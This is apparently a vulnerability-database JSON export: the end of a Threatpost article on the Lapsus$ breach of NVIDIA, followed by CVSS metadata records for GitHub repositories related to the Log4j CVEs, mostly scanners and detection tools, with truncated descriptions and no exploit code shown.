[report](<https://www.telegraph.co.uk/business/2022/02/25/us-microchip-powerhouse-nvidia-hit-cyber-attack/>) cited an insider who said that the intrusion \u201ccompletely compromised\u201d the company\u2019s internal systems, it could be that the stolen data included former employees.\n\nLapsus$ released a portion of the highly confidential stolen data, including source codes, GPU drivers and documentation on NVIDIA\u2019s fast logic controller product, also known as Falcon and Lite Hash Rate, or LHR GPU.\n\nLapsus$ demanded $1 million and a percentage of an unspecified fee from NVIDIA for the Lite Hash Rate bypass.\n\nLapsus$ also demanded that NVIDIA open-source its drivers, lest Lapsus$ do it itself.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/07123426/Lapsus-threat.jpg>)\n\n## Who Is Lapsus$ Group?\n\nLapsus$ Group emerged last year. It\u2019s probably best known [for its December attack](<https://www.zdnet.com/article/brazilian-ministry-of-health-suffers-cyberattack-and-covid-19-vaccination-data-vanishes/>) on the Brazil Ministry of Health that took down several online entities, successfully wiping out information on citizens\u2019 COVID-19 vaccination data as well as disrupting the system that issues digital vaccination certificates.\n\nIn January, Lapsus$ also [crippled](<https://threatpost.com/portuguese-media-giant-impresa-ransomware/177323/>) the Portuguese media giant Impresa.\n\nLapsus$ also recently released what is purportedly a [massive dump](<https://betanews.com/2022/03/06/lapsus-hackers-leak-samsung-source-code-and-massive-data-dump-from-security-breach/>) of proprietary source code [stolen](<https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/>) from Samsung, vx-underground [reported](<https://twitter.com/vxunderground/status/1499882337957515274>).\n\n030722 16:06 UPDATE: Added commentary from Casey Bisson and Mike Parkin.\n\n_Register Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** scheduled for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype._\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T17:46:39", "type": "threatpost", "title": "NVIDIA\u2019s Stolen Code-Signing Certs Used to Sign Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T17:46:39", "id": "THREATPOST:1309DBA0F8A2727965C6FA284A002D3B", "href": "https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-01-01T17:13:44", "description": "Test this content before applying it to production systems.\n\n# U...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T18:51:07", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45105", "CVE-2021-45046", "CVE-2021-44228"], "modified": "2022-01-01T14:37:49", "id": "29A41C2D-FF26-591A-A88B-DDB396742BBC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-13T03:23:12", "description": "## Log4J-CVE-Detect\n\nThis repository contains a set of YARA rule...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T16:08:47", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-45105", "CVE-2021-44228"], "modified": "2022-03-13T01:33:28", "id": "CBCB527D-3C29-5E5B-8C71-D7F20AB001D0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-31T01:27:14", "description": "# log4j-finder\n\nA Python3 script to scan the filesystem to find ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T10:04:42", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-03-30T22:28:03", "id": "6A4495E8-D723-5923-BB6A-B9EA838CF69B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-15T14:34:49", "description": "# Log4Shell Sentinel - A Smart CVE-2021-44228 Scanner\n\n## Introd...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T08:35:04", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45105", "CVE-2021-45046", "CVE-2021-44228"], "modified": "2022-01-15T12:13:09", "id": "97F1C960-A343-5B1E-B261-4834CF80B790", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-28T12:59:10", "description": "# log4shelldetect\n\nScans a file or folder recursively for Java p...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T01:08:00", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-03-28T12:21:44", "id": "CB9B5FAA-47CA-5D85-91B9-0AC5179D527B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-27T12:02:26", "description": "# scan4log4shell\n> Scanner to send specially crafted requests an...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T06:09:04", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228", "CVE-2021-45105"], "modified": "2022-02-27T02:39:14", "id": "2AF28508-1272-5281-BDB7-B44D3EFC7C72", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-18T17:13:06", "description": "# \ud83d\udca1 Log4j CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 Resourc...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T11:34:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45105", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-18T15:25:17", "id": "C3DA2A71-DD68-5EF3-AC4C-5A10DECD333B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-06T00:04:58", "description": "<pre>\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2580\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T14:29:05", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45105"], "modified": "2022-03-05T22:52:28", "id": "6D93189D-E2D8-5571-88D5-D778E1CB9C23", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-04T13:56:34", "description": "<div align=\"center\" >\ud83e\udd1d Show your support - give a \u2b50\ufe0f if you like...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T22:35:00", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-04-04T10:19:19", "id": "CC4175EB-3B91-5ABB-A700-84FC1105AAD5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-06T00:04:09", "description": "<pre>\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2580\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T14:29:05", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45105"], "modified": "2022-03-05T22:52:28", "id": "44463794-7940-582A-AFFF-676628A86A72", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-08T20:34:24", "description": "# CVE-2021-44228 a.k.a. LOG4J\nThis is a public repository from W...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T15:13:06", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44832", "CVE-2021-45105", "CVE-2021-44228"], "modified": "2022-01-08T17:32:42", "id": "C772DCBB-20D0-51DD-A580-F96689E65773", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-05T16:29:14", "description": "# divd-2021-00038--log4j-scanner\n\nThis scanner will recursively ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T12:16:07", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-04-05T07:52:27", "id": "54E7D93D-9216-5EDE-A4AD-8324A367E67B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-31T08:13:42", "description": "<h1><img src='https://raw.githubusercontent.com/mergebase/log4j-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T00:29:03", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-03-31T03:02:14", "id": "C68080B0-3163-5E76-AD65-2B454DBB95EE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-21T23:09:12", "description": "# CVE-2021-44228\nIl 9 dicembre 2021 il mondo \u00e8 venuto a conoscen...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T10:36:16", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228", "CVE-2021-4104", "CVE-2021-45105"], "modified": "2021-12-21T11:08:13", "id": "D298A3C8-E215-5549-B1A0-D01215070203", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-18T12:33:49", "description": "# Patch pulsar images with Apache Log4J 2.17.1 upgrade\n\nCovers [...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T15:46:49", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-03-18T12:16:50", "id": "7B9BDDBA-81E8-5739-B3F7-419C0D6E2316", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-20T09:16:40", "description": "# Sample Log4j2 vulnerable application (CVE-2021-45105) \n# Versi...", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-18T14:24:46", "type": "githubexploit", "title": "Exploit for Uncontrolled Recursion in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45105"], "modified": "2021-12-20T02:29:56", "id": "938D4200-A40C-5294-A146-4DF378B29573", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-20T23:07:31", "description": "# log4j exploitation Proof Of Concept\n\n---\nAuthor:[hackername](h...", "cvss3": {}, "published": "2021-12-20T21:27:55", "type": "githubexploit", "title": "Exploit for CVE-2021-45105", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": 